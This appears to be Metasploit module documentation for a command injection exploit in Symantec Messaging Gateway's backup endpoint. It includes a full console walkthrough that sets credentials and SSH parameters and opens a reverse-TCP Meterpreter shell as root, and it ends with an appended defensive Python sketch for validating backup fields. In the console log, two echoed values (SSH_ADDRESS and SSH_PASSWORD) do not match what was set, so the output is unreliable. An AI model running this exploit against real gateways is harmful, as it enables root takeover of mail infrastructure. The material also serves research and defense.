## Vulnerable Application

This module exploits a command injection vulnerability in the Symantec Messaging Gateway product. An authenticated user can execute terminal commands in the context of the web server user, which is root.

The `backupNow.do` endpoint takes several user inputs and passes them to the internal service responsible for executing operating system commands. One of these inputs is passed to the service without proper validation, which causes a command injection vulnerability.

However, the supplied parameters, such as the SSH IP address, port and credentials, are validated before the terminal command is executed. You therefore need to configure your own SSH service and set the required parameters when using the module.

**Vulnerable Application Installation Steps**

Click the "free trial" button at the following URL.

[https://www.symantec.com/products/messaging-security/messaging-gateway](https://www.symantec.com/products/messaging-security/messaging-gateway)

You need to complete the registration in order to download the ISO file. The license file will be delivered to your e-mail address.

## Verification Steps

A successful check of the exploit will look like this:

```
msf > use exploit/linux/http/symantec_messaging_gateway_exec
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : hacker.dev
OS : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```
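
The root cause described under Vulnerable Application is that some backup fields were validated while one reached the command unchecked. The sketch below is an added example, not Symantec's code or part of the module: it shows the defensive pattern of allowlisting every field and building an argument vector instead of a shell string. The field names, the use of `scp` and the archive path are assumptions.

```python
import ipaddress
import re

# Hypothetical field names; the page does not name the request parameters.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
PATH_RE = re.compile(r"(?:/[A-Za-z0-9._-]+)+")


def invalid_fields(req):
    """Return the names of the request fields that fail their allowlist check."""
    bad = []
    try:
        ipaddress.ip_address(req.get("address", ""))
    except ValueError:
        bad.append("address")
    port = req.get("port")
    if not (type(port) is int and 1 <= port <= 65535):
        bad.append("port")
    if not USERNAME_RE.fullmatch(str(req.get("username", ""))):
        bad.append("username")
    path = str(req.get("remote_path", ""))
    # Reject shell metacharacters, whitespace and ".." path segments.
    if not PATH_RE.fullmatch(path) or ".." in path.split("/"):
        bad.append("remote_path")
    return bad


def build_backup_argv(req, archive="/var/tmp/backup.tar.gz"):
    """Build the transfer command as an argv list; raise if any field is invalid."""
    bad = invalid_fields(req)
    if bad:
        raise ValueError("rejected fields: " + ", ".join(bad))
    ip = ipaddress.ip_address(req["address"])
    host = f"[{ip}]" if ip.version == 6 else str(ip)
    target = f"{req['username']}@{host}:{req['remote_path']}"
    # No shell parses this: each element reaches exec as exactly one argument,
    # and "--" stops a value from being read as an option.
    # The password is deliberately never placed on the command line.
    return ["scp", "-P", str(req["port"]), "--", archive, target]


if __name__ == "__main__":
    # Constructed sample request, not captured traffic.
    sample = {"address": "192.0.2.15", "port": 22,
              "username": "backup", "remote_path": "/srv/backups"}
    print(build_backup_argv(sample))
    print(invalid_fields(dict(sample, remote_path="/srv/backups;echo INJECTED")))
```

Pass the returned list to `subprocess.run(argv, shell=False)` so the values are never re-parsed by a shell.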